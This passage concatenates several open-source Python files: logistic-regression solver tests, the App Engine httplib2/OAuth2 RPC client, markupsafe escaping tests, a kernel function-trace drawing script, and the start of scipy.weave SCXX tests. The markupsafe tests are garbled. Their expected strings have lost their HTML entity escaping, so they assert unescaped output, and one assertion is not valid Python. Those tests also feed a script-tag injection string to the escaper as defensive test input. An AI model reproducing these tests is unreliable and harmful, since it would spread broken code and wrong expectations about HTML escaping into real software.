**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.print_every, self.int_1)
self.assertEqual(learner._solver_obj.print_every, self.int_1)
learner.print_every = self.int_2
self.assertEqual(learner.print_every, self.int_2)
self.assertEqual(learner._solver_obj.print_every, self.int_2)
# record_every
learner = LogisticRegression(solver=solver,
record_every=self.int_1,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.record_every, self.int_1)
self.assertEqual(learner._solver_obj.record_every, self.int_1)
learner.record_every = self.int_2
self.assertEqual(learner.record_every, self.int_2)
self.assertEqual(learner._solver_obj.record_every, self.int_2)
def test_LogisticRegression_solver_step(self):
"""...Test LogisticRegression setting of step parameter of solver
"""
for solver in solvers:
if solver in ['sdca', 'bfgs']:
msg = '^Solver "%s" has no settable step$' % solver
with self.assertWarnsRegex(RuntimeWarning, msg):
learner = LogisticRegression(
solver=solver, step=1,
**Test.specific_solver_kwargs(solver))
self.assertIsNone(learner.step)
else:
learner = LogisticRegression(
solver=solver, step=self.float_1,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.step, self.float_1)
self.assertEqual(learner._solver_obj.step, self.float_1)
learner.step = self.float_2
self.assertEqual(learner.step, self.float_2)
self.assertEqual(learner._solver_obj.step, self.float_2)
if solver in ['sgd']:
msg = '^SGD step needs to be tuned manually$'
with self.assertWarnsRegex(RuntimeWarning, msg):
learner = LogisticRegression(solver='sgd')
learner.fit(self.X, self.y)
def test_LogisticRegression_solver_random_state(self):
"""...Test LogisticRegression setting of random_state parameter of solver
"""
for solver in solvers:
if solver in ['bfgs', 'agd', 'gd']:
msg = '^Solver "%s" has no settable random_state$' % solver
with self.assertWarnsRegex(RuntimeWarning, msg):
learner = LogisticRegression(
solver=solver, random_state=1,
**Test.specific_solver_kwargs(solver))
self.assertIsNone(learner.random_state)
else:
learner = LogisticRegression(
solver=solver, random_state=self.int_1,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.random_state, self.int_1)
self.assertEqual(learner._solver_obj.seed, self.int_1)
msg = '^random_state must be positive, got -1$'
with self.assertRaisesRegex(ValueError, msg):
LogisticRegression(solver=solver, random_state=-1,
**Test.specific_solver_kwargs(solver))
msg = '^random_state is readonly in LogisticRegression$'
with self.assertRaisesRegex(AttributeError, msg):
learner = LogisticRegression(
solver=solver, **Test.specific_solver_kwargs(solver))
learner.random_state = self.int_2
def test_LogisticRegression_solver_sdca_ridge_strength(self):
"""...Test LogisticRegression setting of sdca_ridge_strength parameter
of solver
"""
for solver in solvers:
if solver == 'sdca':
learner = LogisticRegression(
solver=solver, sdca_ridge_strength=self.float_1,
**Test.specific_solver_kwargs(solver))
self.assertEqual(learner.sdca_ridge_strength, self.float_1)
self.assertEqual(learner._solver_obj._solver.get_l_l2sq(),
self.float_1)
learner.sdca_ridge_strength = self.float_2
self.assertEqual(learner.sdca_ridge_strength, self.float_2)
self.assertEqual(learner._solver_obj._solver.get_l_l2sq(),
self.float_2)
else:
msg = '^Solver "%s" has no sdca_ridge_strength attribute$' % \
solver
with self.assertWarnsRegex(RuntimeWarning, msg):
LogisticRegression(solver=solver, sdca_ridge_strength=1e-2,
**Test.specific_solver_kwargs(solver))
learner = LogisticRegression(
solver=solver, **Test.specific_solver_kwargs(solver))
with self.assertWarnsRegex(RuntimeWarning, msg):
learner.sdca_ridge_strength = self.float_1
def test_safe_array_cast(self):
"""...Test error and warnings raised by LogLearner constructor
"""
msg = '^Copying array of size \(5, 5\) to convert it in the ' \
'right format$'
with self.assertWarnsRegex(RuntimeWarning, msg):
LogisticRegression._safe_array(self.X.astype(int))
msg = '^Copying array of size \(3, 5\) to create a ' \
'C-contiguous version of it$'
with self.assertWarnsRegex(RuntimeWarning, msg):
LogisticRegression._safe_array(self.X[::2])
np.testing.assert_array_equal(self.X,
LogisticRegression._safe_array(self.X))
def test_labels_encoding(self):
"""...Test that class encoding is well done for LogReg
"""
learner = LogisticRegression(max_iter=1)
np.random.seed(38027)
n_features = 3
n_samples = 5
X = np.random.rand(n_samples, n_features)
encoded_y = np.array([1., -1., 1., -1., -1.])
learner.fit(X, encoded_y)
np.testing.assert_array_equal(learner.classes, [-1., 1.])
np.testing.assert_array_equal(
learner._encode_labels_vector(encoded_y), encoded_y)
zero_one_y = np.array([1., 0., 1., 0., 0.])
learner.fit(X, zero_one_y)
np.testing.assert_array_equal(learner.classes, [0., 1.])
np.testing.assert_array_equal(
learner._encode_labels_vector(zero_one_y), encoded_y)
text_y = np.array(['cat', 'dog', 'cat', 'dog', 'dog'])
learner.fit(X, text_y)
np.testing.assert_array_equal(set(learner.classes), {'cat', 'dog'})
encoded_text_y = learner._encode_labels_vector(text_y)
np.testing.assert_array_equal(
encoded_text_y,
encoded_y * np.sign(encoded_text_y[0]) * np.sign(encoded_y[0]))
def test_predict(self):
"""...Test LogReg prediction
"""
labels_mappings = [{
-1: -1.,
1: 1.
}, {
-1: 1.,
1: -1.
}, {
-1: 1,
1: 0
}, {
-1: 0,
1: 1
}, {
-1: 'cat',
1: 'dog'
}]
for labels_mapping in labels_mappings:
X, y = Test.get_train_data(n_features=12, n_samples=300, nnz=0)
y = np.vectorize(labels_mapping.get)(y)
learner = LogisticRegression(random_state=32789, tol=1e-9)
learner.fit(X, y)
X_test, y_test = Test.get_train_data(n_features=12, n_samples=5,
nnz=0)
predicted_y = [1., 1., -1., 1., 1.]
predicted_y = np.vectorize(labels_mapping.get)(predicted_y)
np.testing.assert_array_equal(learner.predict(X_test), predicted_y)
def test_predict_proba(self):
"""...Test LogReg predict_proba
"""
X, y = Test.get_train_data(n_features=12, n_samples=300, nnz=0)
learner = LogisticRegression(random_state=32289, tol=1e-13)
learner.fit(X, y)
X_test, y_test = Test.get_train_data(n_features=12, n_samples=5, nnz=0)
predicted_probas = np.array(
[[0.35851418, 0.64148582], [0.42549328, 0.57450672],
[0.6749705, 0.3250295], [0.39684181,
0.60315819], [0.42732443, 0.57267557]])
np.testing.assert_array_almost_equal(
learner.predict_proba(X_test), predicted_probas, decimal=3)
def test_decision_function(self):
"""...Test LogReg predict_proba
"""
X, y = Test.get_train_data(n_features=12, n_samples=300, nnz=0)
learner = LogisticRegression(random_state=32789, tol=1e-13)
learner.fit(X, y)
X_test, y_test = Test.get_train_data(n_features=12, n_samples=5, nnz=0)
decision_function_values = np.array(
[0.58182, 0.30026, -0.73075, 0.41864, 0.29278])
np.testing.assert_array_almost_equal(
learner.decision_function(X_test), decision_function_values,
decimal=3)
def test_float_double_arrays_fitting(self):
X, y = Test.get_train_data(n_features=12, n_samples=300, nnz=0)
learner_64 = LogisticRegression(random_state=32789, tol=1e-13)
learner_64.fit(X, y)
weights_64 = learner_64.weights
self.assertEqual(weights_64.dtype, np.dtype('float64'))
learner_32 = LogisticRegression(random_state=32789, tol=1e-13)
X_32, y_32 = X.astype('float32'), y.astype('float32')
learner_32.fit(X_32, y_32)
weights_32 = learner_32.weights
self.assertEqual(weights_32.dtype, np.dtype('float32'))
np.testing.assert_array_almost_equal(weights_32, weights_64, decimal=5)
if __name__ == "__main__":
unittest.main()
| bsd-3-clause |
undoware/neutron-drive | google_appengine/google/appengine/tools/appengine_rpc_httplib2.py | 3 | 12798 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Library with a variant of appengine_rpc using httplib2.
The httplib2 module offers some of the features in appengine_rpc, with
one important one being a simple integration point for OAuth2 integration.
"""
import cStringIO
import logging
import os
import re
import urllib
import urllib2
import httplib2
from oauth2client import client
from oauth2client import file as oauth2client_file
from oauth2client import tools
logger = logging.getLogger('google.appengine.tools.appengine_rpc')
class Error(Exception):
  """Base class for exceptions raised by this module."""
  pass


class AuthPermanentFail(Error):
  """Authentication will not succeed in the current context."""
class MemoryCache(object):
  """httplib2 Cache implementation which only caches locally.

  Implements the minimal get/set/delete protocol httplib2 expects,
  backed by a plain in-process dict; nothing is persisted to disk.
  """

  def __init__(self):
    self.cache = {}

  def get(self, key):
    """Return the cached value for key, or None when absent."""
    try:
      return self.cache[key]
    except KeyError:
      return None

  def set(self, key, value):
    """Store value under key, replacing any previous entry."""
    self.cache[key] = value

  def delete(self, key):
    """Remove key if present; a no-op for unknown keys."""
    if key in self.cache:
      del self.cache[key]
def RaiseHttpError(url, response_info, response_body, extra_msg=''):
  """Raise a urllib2.HTTPError based on an httplib2 response tuple.

  Args:
    url: The URL the failing request was sent to.
    response_info: The httplib2 response object (has .status and .reason).
    response_body: The response payload, or None.
    extra_msg: Optional text appended to the reason in the error message.

  Raises:
    urllib2.HTTPError: always.
  """
  # Wrap the body in a file-like object so callers can .read() the error,
  # mirroring what urllib2 itself provides.
  if response_body is not None:
    stream = cStringIO.StringIO()
    stream.write(response_body)
    stream.seek(0)
  else:
    stream = None
  if not extra_msg:
    msg = response_info.reason
  else:
    msg = response_info.reason + ' ' + extra_msg
  raise urllib2.HTTPError(url, response_info.status, msg, response_info, stream)
class HttpRpcServerHttpLib2(object):
  """A variant of HttpRpcServer which uses httplib2.

  This follows the same interface as appengine_rpc.AbstractRpcServer,
  but is a totally separate implementation. Subclasses must implement
  _Authenticate; Send drives the request/retry/auth loop.
  """

  def __init__(self, host, auth_function, user_agent, source,
               host_override=None, extra_headers=None, save_cookies=False,
               auth_tries=None, account_type=None, debug_data=True, secure=True,
               rpc_tries=3):
    """Creates a new HttpRpcServerHttpLib2.

    Args:
      host: The host to send requests to.
      auth_function: Saved but ignored; may be used by subclasses.
      user_agent: The user-agent string to send to the server. Specify None to
        omit the user-agent header.
      source: Saved but ignored; may be used by subclasses.
      host_override: The host header to send to the server (defaults to host).
      extra_headers: A dict of extra headers to append to every request. Values
        supplied here will override other default headers that are supplied.
      save_cookies: Saved but ignored; may be used by subclasses.
      auth_tries: The number of times to attempt auth_function before failing.
      account_type: Saved but ignored; may be used by subclasses.
      debug_data: Whether debugging output should include data contents.
      secure: If the requests sent using Send should be sent over HTTPS.
      rpc_tries: The number of rpc retries upon http server error (i.e.
        Response code >= 500 and < 600) before failing.
    """
    self.host = host
    self.auth_function = auth_function
    self.user_agent = user_agent
    self.source = source
    self.host_override = host_override
    self.extra_headers = extra_headers
    self.save_cookies = save_cookies
    self.auth_tries = auth_tries
    self.account_type = account_type
    self.debug_data = debug_data
    self.secure = secure
    self.rpc_tries = rpc_tries
    # Python 2 idiom for a conditional expression.
    self.scheme = secure and 'https' or 'http'
    # CA bundle shipped with the SDK, relative to this module's location.
    self.certpath = os.path.normpath(os.path.join(
        os.path.dirname(__file__), '..', '..', '..', 'lib', 'cacerts',
        'cacerts.txt'))
    self.cert_file_available = os.path.exists(self.certpath)
    # Local cache so httplib2 never writes cache entries to disk.
    self.memory_cache = MemoryCache()

  def _Authenticate(self, http, saw_error):
    """Pre or Re-auth stuff...

    Subclass hook: configure authentication on the given Http object.

    Args:
      http: An 'Http' object from httplib2.
      saw_error: If the user has already tried to contact the server.
        If they have, it's OK to prompt them. If not, we should not be asking
        them for auth info--it's possible it'll suceed w/o auth.
    """
    raise NotImplementedError()

  def Send(self, request_path, payload='',
           content_type='application/octet-stream',
           timeout=None,
           **kwargs):
    """Sends an RPC and returns the response.

    Args:
      request_path: The path to send the request to, eg /api/appversion/create.
      payload: The body of the request, or None to send an empty request.
      content_type: The Content-Type header to use.
      timeout: timeout in seconds; default None i.e. no timeout.
        (Note: for large requests on OS X, the timeout doesn't work right.)
      Any keyword arguments are converted into query string parameters.

    Returns:
      The response body, as a string.

    Raises:
      AuthPermanentFail: If authorization failed in a permanent way.
      urllib2.HTTPError: On most HTTP errors.
    """
    self.http = httplib2.Http(cache=self.memory_cache, ca_certs=self.certpath)
    # Redirects are handled explicitly below (302 branch), not by httplib2.
    self.http.follow_redirects = False
    self.http.timeout = timeout
    url = '%s://%s%s' % (self.scheme, self.host, request_path)
    if kwargs:
      url += '?' + urllib.urlencode(kwargs)
    headers = {}
    if self.extra_headers:
      headers.update(self.extra_headers)
    headers['X-appcfg-api-version'] = '1'
    if payload is not None:
      method = 'POST'
      headers['content-length'] = str(len(payload))
      headers['Content-Type'] = content_type
    else:
      method = 'GET'
    if self.host_override:
      headers['Host'] = self.host_override
    tries = 0
    # One-element list so the nested closure can mutate the counter
    # (Python 2 has no 'nonlocal').
    auth_tries = [0]
    def NeedAuth():
      """Marker that we need auth; it'll actually be tried next time around."""
      auth_tries[0] += 1
      if auth_tries[0] > self.auth_tries:
        # response_info/response come from the enclosing loop scope; NeedAuth
        # is only ever called after at least one request has completed.
        RaiseHttpError(url, response_info, response, 'Too many auth attempts.')
    while tries < self.rpc_tries:
      tries += 1
      self._Authenticate(self.http, auth_tries[0] > 0)
      logger.debug('Sending request to %s headers=%s body=%s',
                   url, headers,
                   # Show real payload only when debug_data; else elide it.
                   self.debug_data and payload or payload and 'ELIDED' or '')
      try:
        response_info, response = self.http.request(url, method, body=payload,
                                                    headers=headers)
      except client.AccessTokenRefreshError, e:
        # Synthesize a 401 so the normal auth-retry path handles it.
        logger.info('Got access token error', exc_info=1)
        response_info = httplib2.Response({'status': 401})
        response_info.reason = str(e)
        response = ''
      status = response_info.status
      if status == 200:
        return response
      logger.debug('Got http error %s, this is try #%s',
                   response_info.status, tries)
      if status == 401:
        NeedAuth()
        continue
      elif status >= 500 and status < 600:
        # Server errors are retried up to rpc_tries times.
        continue
      elif status == 302:
        loc = response_info.get('location')
        logger.debug('Got 302 redirect. Location: %s', loc)
        if (loc.startswith('https://www.google.com/accounts/ServiceLogin') or
            re.match(r'https://www.google.com/a/[a-z0-9.-]+/ServiceLogin',
                     loc)):
          # Redirect to a Google login page means our auth was rejected.
          NeedAuth()
          continue
        elif loc.startswith('http://%s/_ah/login' % (self.host,)):
          RaiseHttpError(url, response_info, response,
                         'dev_appserver login not supported')
        else:
          RaiseHttpError(url, response_info, response,
                         'Unexpected redirect to %s' % loc)
      else:
        logger.debug('Unexpected results: %s', response_info)
        RaiseHttpError(url, response_info, response,
                       'Unexpected HTTP status %s' % status)
    logging.info('Too many retries for url %s', url)
    RaiseHttpError(url, response_info, response)
class NoStorage(client.Storage):
  """A no-op implementation of storage.

  Used when save_cookies is off: credentials are never persisted and
  never found on load.
  """

  def locked_get(self):
    # Nothing is ever stored, so there is never anything to return.
    return None

  def locked_put(self, credentials):
    # Deliberately discard the credentials instead of saving them.
    pass
class HttpRpcServerOauth2(HttpRpcServerHttpLib2):
  """A variant of HttpRpcServer which uses oauth2.

  This variant is specifically meant for interactive command line usage,
  as it will attempt to open a browser and ask the user to enter
  information from the resulting web page.
  """

  def __init__(self, host, refresh_token, user_agent, source,
               host_override=None, extra_headers=None, save_cookies=False,
               auth_tries=None, account_type=None, debug_data=True, secure=True,
               rpc_tries=3):
    """Creates a new HttpRpcServerOauth2.

    Args:
      host: The host to send requests to.
      refresh_token: A string refresh token to use, or None to guide the user
        through the auth flow. (Replaces auth_function on parent class.)
      user_agent: The user-agent string to send to the server. Specify None to
        omit the user-agent header.
      source: Tuple, (client_id, client_secret, scope), for oauth credentials.
      host_override: The host header to send to the server (defaults to host).
      extra_headers: A dict of extra headers to append to every request. Values
        supplied here will override other default headers that are supplied.
      save_cookies: If the refresh token should be saved.
      auth_tries: The number of times to attempt auth_function before failing.
      account_type: Ignored.
      debug_data: Whether debugging output should include data contents.
      secure: If the requests sent using Send should be sent over HTTPS.
      rpc_tries: The number of rpc retries upon http server error (i.e.
        Response code >= 500 and < 600) before failing.

    Raises:
      TypeError: If source is not a 3-tuple.
    """
    super(HttpRpcServerOauth2, self).__init__(
        host, None, user_agent, None, host_override=host_override,
        extra_headers=extra_headers, auth_tries=auth_tries,
        debug_data=debug_data, secure=secure, rpc_tries=rpc_tries)
    if save_cookies:
      # Persist tokens in the user's home directory across runs.
      self.storage = oauth2client_file.Storage(
          os.path.expanduser('~/.appcfg_oauth2_tokens'))
    else:
      self.storage = NoStorage()
    if not isinstance(source, tuple) or len(source) != 3:
      raise TypeError('Source must be tuple (client_id, client_secret, scope).')
    self.client_id = source[0]
    self.client_secret = source[1]
    self.scope = source[2]
    self.refresh_token = refresh_token
    if refresh_token:
      # An explicitly supplied refresh token bypasses storage entirely;
      # access token starts as None and is refreshed on demand.
      self.credentials = client.OAuth2Credentials(
          None,
          self.client_id,
          self.client_secret,
          refresh_token,
          None,
          ('https://%s/o/oauth2/token' %
           os.getenv('APPENGINE_AUTH_SERVER', 'accounts.google.com')),
          self.user_agent)
    else:
      self.credentials = self.storage.get()

  def _Authenticate(self, http, needs_auth):
    """Pre or Re-auth stuff...

    This will attempt to avoid making any OAuth related HTTP connections or
    user interactions unless it's needed.

    Args:
      http: An 'Http' object from httplib2.
      needs_auth: If the user has already tried to contact the server.
        If they have, it's OK to prompt them. If not, we should not be asking
        them for auth info--it's possible it'll suceed w/o auth, but if we have
        some credentials we'll use them anyway.

    Raises:
      AuthPermanentFail: The user has requested non-interactive auth but
        the token is invalid.
    """
    if needs_auth and (not self.credentials or self.credentials.invalid):
      if self.refresh_token:
        # User supplied the token explicitly: retrying interactively would
        # contradict their intent, so fail permanently.
        logger.debug('_Authenticate and skipping auth because user explicitly '
                     'supplied a refresh token.')
        raise AuthPermanentFail('Refresh token is invalid.')
      logger.debug('_Authenticate and requesting auth')
      # Interactive flow: may open a browser and prompt the user.
      flow = client.OAuth2WebServerFlow(
          client_id=self.client_id,
          client_secret=self.client_secret,
          scope=self.scope,
          user_agent=self.user_agent)
      self.credentials = tools.run(flow, self.storage)
    if self.credentials and not self.credentials.invalid:
      # Only attach credentials when the token is fresh or the server has
      # already rejected an unauthenticated attempt.
      if not self.credentials.access_token_expired or needs_auth:
        logger.debug('_Authenticate configuring auth; needs_auth=%s',
                     needs_auth)
        self.credentials.authorize(http)
        return
    logger.debug('_Authenticate skipped auth; needs_auth=%s', needs_auth)
| bsd-3-clause |
dkindel/ece5574team7RESTAPI | lib/markupsafe/tests.py | 674 | 6107 | # -*- coding: utf-8 -*-
import gc
import sys
import unittest
from markupsafe import Markup, escape, escape_silent
from markupsafe._compat import text_type
class MarkupTestCase(unittest.TestCase):
    """Behavioral tests for markupsafe.Markup / escape.

    NOTE(review): several expected strings below (e.g. '<em><bad user></em>')
    look like they lost their HTML entity escaping ('&lt;', '&gt;', '&amp;')
    during extraction of this file — verify against upstream markupsafe
    before trusting the literals.
    """

    def test_adding(self):
        # adding two strings should escape the unsafe one
        unsafe = '<script type="application/x-some-script">alert("foo");</script>'
        safe = Markup('<em>username</em>')
        assert unsafe + safe == text_type(escape(unsafe)) + text_type(safe)

    def test_string_interpolation(self):
        # string interpolations are safe to use too
        assert Markup('<em>%s</em>') % '<bad user>' == \
            '<em><bad user></em>'
        assert Markup('<em>%(username)s</em>') % {
            'username': '<bad user>'
        } == '<em><bad user></em>'
        assert Markup('%i') % 3.14 == '3'
        assert Markup('%.2f') % 3.14 == '3.14'

    def test_type_behavior(self):
        # an escaped object is markup too
        assert type(Markup('foo') + 'bar') is Markup
        # and it implements __html__ by returning itself
        x = Markup("foo")
        assert x.__html__() is x

    def test_html_interop(self):
        # it also knows how to treat __html__ objects
        class Foo(object):
            def __html__(self):
                return '<em>awesome</em>'
            def __unicode__(self):
                return 'awesome'
            __str__ = __unicode__
        assert Markup(Foo()) == '<em>awesome</em>'
        assert Markup('<strong>%s</strong>') % Foo() == \
            '<strong><em>awesome</em></strong>'

    def test_tuple_interpol(self):
        self.assertEqual(Markup('<em>%s:%s</em>') % (
            '<foo>',
            '<bar>',
        ), Markup(u'<em><foo>:<bar></em>'))

    def test_dict_interpol(self):
        self.assertEqual(Markup('<em>%(foo)s</em>') % {
            'foo': '<foo>',
        }, Markup(u'<em><foo></em>'))
        self.assertEqual(Markup('<em>%(foo)s:%(bar)s</em>') % {
            'foo': '<foo>',
            'bar': '<bar>',
        }, Markup(u'<em><foo>:<bar></em>'))

    def test_escaping(self):
        # escaping and unescaping
        assert escape('"<>&\'') == '"<>&''
        assert Markup("<em>Foo & Bar</em>").striptags() == "Foo & Bar"
        assert Markup("<test>").unescape() == "<test>"

    def test_formatting(self):
        for actual, expected in (
            (Markup('%i') % 3.14, '3'),
            (Markup('%.2f') % 3.14159, '3.14'),
            (Markup('%s %s %s') % ('<', 123, '>'), '< 123 >'),
            (Markup('<em>{awesome}</em>').format(awesome='<awesome>'),
             '<em><awesome></em>'),
            (Markup('{0[1][bar]}').format([0, {'bar': '<bar/>'}]),
             '<bar/>'),
            (Markup('{0[1][bar]}').format([0, {'bar': Markup('<bar/>')}]),
             '<bar/>')):
            assert actual == expected, "%r should be %r!" % (actual, expected)

    # This is new in 2.7
    if sys.version_info >= (2, 7):
        def test_formatting_empty(self):
            formatted = Markup('{}').format(0)
            assert formatted == Markup('0')

    def test_custom_formatting(self):
        class HasHTMLOnly(object):
            def __html__(self):
                return Markup('<foo>')
        class HasHTMLAndFormat(object):
            def __html__(self):
                return Markup('<foo>')
            def __html_format__(self, spec):
                return Markup('<FORMAT>')
        # __html_format__ takes precedence over __html__ inside format().
        assert Markup('{0}').format(HasHTMLOnly()) == Markup('<foo>')
        assert Markup('{0}').format(HasHTMLAndFormat()) == Markup('<FORMAT>')

    def test_complex_custom_formatting(self):
        class User(object):
            def __init__(self, id, username):
                self.id = id
                self.username = username
            def __html_format__(self, format_spec):
                if format_spec == 'link':
                    return Markup('<a href="/user/{0}">{1}</a>').format(
                        self.id,
                        self.__html__(),
                    )
                elif format_spec:
                    raise ValueError('Invalid format spec')
                return self.__html__()
            def __html__(self):
                return Markup('<span class=user>{0}</span>').format(self.username)
        user = User(1, 'foo')
        assert Markup('<p>User: {0:link}').format(user) == \
            Markup('<p>User: <a href="/user/1"><span class=user>foo</span></a>')

    def test_all_set(self):
        # every name in __all__ must actually exist
        import markupsafe as markup
        for item in markup.__all__:
            getattr(markup, item)

    def test_escape_silent(self):
        assert escape_silent(None) == Markup()
        assert escape(None) == Markup(None)
        assert escape_silent('<foo>') == Markup(u'<foo>')

    def test_splitting(self):
        # split/rsplit/splitlines must return Markup pieces, not plain str
        self.assertEqual(Markup('a b').split(), [
            Markup('a'),
            Markup('b')
        ])
        self.assertEqual(Markup('a b').rsplit(), [
            Markup('a'),
            Markup('b')
        ])
        self.assertEqual(Markup('a\nb').splitlines(), [
            Markup('a'),
            Markup('b')
        ])

    def test_mul(self):
        self.assertEqual(Markup('a') * 3, Markup('aaa'))
class MarkupLeakTestCase(unittest.TestCase):
    """Leak check for the markupsafe C speedup module (see suite())."""

    def test_markup_leaks(self):
        counts = set()
        for count in range(20):
            for item in range(1000):
                escape("foo")
                escape("<foo>")
                escape(u"foo")
                escape(u"<foo>")
            # A stable object count across rounds means no per-call leak.
            counts.add(len(gc.get_objects()))
        assert len(counts) == 1, 'ouch, c extension seems to leak objects'
def suite():
    """Build the test suite; the leak check runs only for the C extension."""
    tests = unittest.TestSuite()
    tests.addTest(unittest.makeSuite(MarkupTestCase))
    # The pure-Python escape has a func_code attribute; only the C
    # implementation is worth leak-testing.
    if not hasattr(escape, 'func_code'):
        tests.addTest(unittest.makeSuite(MarkupLeakTestCase))
    return tests
if __name__ == '__main__':
    # Run through suite() so the conditional leak-test inclusion applies.
    unittest.main(defaultTest='suite')
# vim:sts=4:sw=4:et:
| apache-2.0 |
Droid-Concepts/kernel_samsung_jf | scripts/tracing/draw_functrace.py | 14676 | 3560 | #!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <fweisbec@gmail.com>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulted trace is processed into a tree to produce a more human
view of the call stack by drawing textual but hierarchical tree of
calls. Only the functions's names and the the call time are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some times but not too much, the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
    """Tree representation of a kernel function-call stack.

    A function with no traced parent (interrupt, syscall, kernel
    thread...) is attached to a shared virtual parent, CallTree.ROOT.
    repr() renders the tree as an indented textual diagram.
    """

    # Virtual root node; assigned by main() before parsing starts.
    ROOT = None

    def __init__(self, func, time=None, parent=None):
        self._func = func
        self._time = time
        self._parent = CallTree.ROOT if parent is None else parent
        self._children = []

    def calls(self, func, calltime):
        """Record that this node calls func at calltime.

        @return: A reference to the newly created child node.
        """
        node = CallTree(func, calltime, self)
        self._children.append(node)
        return node

    def getParent(self, func):
        """Find the nearest ancestor (including self) named func.

        If no such ancestor exists, a new child of ROOT is created and
        returned instead.

        @return: A reference to the matching (or newly created) node.
        """
        node = self
        while node != CallTree.ROOT and node._func != func:
            node = node._parent
        if node == CallTree.ROOT:
            return CallTree.ROOT.calls(func, None)
        return node

    def __repr__(self):
        return self.__render("", True)

    def __render(self, branch, lastChild):
        # One line for this node, then recurse into children; the last
        # child at each level drops the vertical bar from its branch.
        if self._time is None:
            text = "%s----%s\n" % (branch, self._func)
        else:
            text = "%s----%s (%s)\n" % (branch, self._func, self._time)
        if lastChild:
            branch = branch[:-1] + " "
        last = len(self._children) - 1
        for index, child in enumerate(self._children):
            text += child.__render(branch + " |", index == last)
        return text
class BrokenLineException(Exception):
    """Raised for an incomplete trace line (pipe breakage).

    The caller stops processing and ignores the line.
    """
class CommentLineException(Exception):
    """Raised for a comment line (as at the start of the trace file).

    The caller simply skips the line.
    """
def parseLine(line):
    """Split one ftrace line into its (calltime, callee, caller) triple.

    Raises CommentLineException for '#' comment lines and
    BrokenLineException when the line does not match the trace format.
    """
    stripped = line.strip()
    if stripped.startswith("#"):
        raise CommentLineException
    match = re.match(r"[^]]+?\] +([0-9.]+): (\w+) <-(\w+)", stripped)
    if match is None:
        raise BrokenLineException
    return match.group(1, 2, 3)
def main():
    """Read a raw function trace on stdin and print the drawn call tree."""
    CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
    tree = CallTree.ROOT
    for line in sys.stdin:
        try:
            calltime, callee, caller = parseLine(line)
        except BrokenLineException:
            # Truncated last line (broken pipe) ends the parse cleanly.
            break
        except CommentLineException:
            continue
        # Re-anchor at the caller, then descend into the callee.
        tree = tree.getParent(caller)
        tree = tree.calls(callee, calltime)
    print CallTree.ROOT
if __name__ == "__main__":
    # Script entry point: filters stdin to stdout.
    main()
| gpl-2.0 |
lukauskas/scipy | scipy/weave/tests/test_scxx_object.py | 91 | 27994 | """ Test refcounting and behavior of SCXX.
"""
from __future__ import absolute_import, print_function
import sys
from UserList import UserList
from numpy.testing import (TestCase, assert_equal, assert_, assert_raises,
run_module_suite)
from scipy.weave import inline_tools
from weave_test_utils import debug_print, dec
class TestObjectConstruct(TestCase):
    """py::object construction from basic C++ literal types."""
    #------------------------------------------------------------------------
    # Check that construction from basic types is allowed and have correct
    # reference counts
    #------------------------------------------------------------------------
    @dec.slow
    def test_int(self):
        # strange int value used to try and make sure refcount is 2.
        code = """
               py::object val = 1001;
               return_val = val;
               """
        res = inline_tools.inline(code)
        assert_equal(sys.getrefcount(res),2)
        assert_equal(res,1001)

    @dec.slow
    def test_float(self):
        code = """
               py::object val = (float)1.0;
               return_val = val;
               """
        res = inline_tools.inline(code)
        assert_equal(sys.getrefcount(res),2)
        assert_equal(res,1.0)

    @dec.slow
    def test_double(self):
        code = """
               py::object val = 1.0;
               return_val = val;
               """
        res = inline_tools.inline(code)
        assert_equal(sys.getrefcount(res),2)
        assert_equal(res,1.0)

    @dec.slow
    def test_complex(self):
        code = """
               std::complex<double> num = std::complex<double>(1.0,1.0);
               py::object val = num;
               return_val = val;
               """
        res = inline_tools.inline(code)
        assert_equal(sys.getrefcount(res),2)
        assert_equal(res,1.0+1.0j)

    @dec.slow
    def test_string(self):
        code = """
               py::object val = "hello";
               return_val = val;
               """
        res = inline_tools.inline(code)
        assert_equal(sys.getrefcount(res),2)
        assert_equal(res,"hello")

    @dec.slow
    def test_std_string(self):
        code = """
               std::string s = std::string("hello");
               py::object val = s;
               return_val = val;
               """
        res = inline_tools.inline(code)
        assert_equal(sys.getrefcount(res),2)
        assert_equal(res,"hello")
class TestObjectPrint(TestCase):
    """py::object.print() to a Python file-like object."""
    #------------------------------------------------------------------------
    # Check the object print protocol.
    #------------------------------------------------------------------------
    @dec.slow
    def test_stringio(self):
        import cStringIO
        file_imposter = cStringIO.StringIO()
        code = """
               py::object val = "how now brown cow";
               val.print(file_imposter);
               """
        res = inline_tools.inline(code,['file_imposter'])
        debug_print(file_imposter.getvalue())
        # print() writes the repr, hence the surrounding quotes.
        assert_equal(file_imposter.getvalue(),"'how now brown cow'")

##    @dec.slow
##    def test_failure(self):
##        code = """
##               FILE* file = 0;
##               py::object val = "how now brown cow";
##               val.print(file);
##               """
##        try:
##            res = inline_tools.inline(code)
##        except:
##            # error was supposed to occur.
##            pass
class TestObjectCast(TestCase):
    """Implicit conversion from py::object back to C++ scalar types."""

    @dec.slow
    def test_int_cast(self):
        code = """
               py::object val = 1;
               int raw_val __attribute__ ((unused)) = val;
               """
        inline_tools.inline(code)

    @dec.slow
    def test_double_cast(self):
        code = """
               py::object val = 1.0;
               double raw_val __attribute__ ((unused)) = val;
               """
        inline_tools.inline(code)

    @dec.slow
    def test_float_cast(self):
        code = """
               py::object val = 1.0;
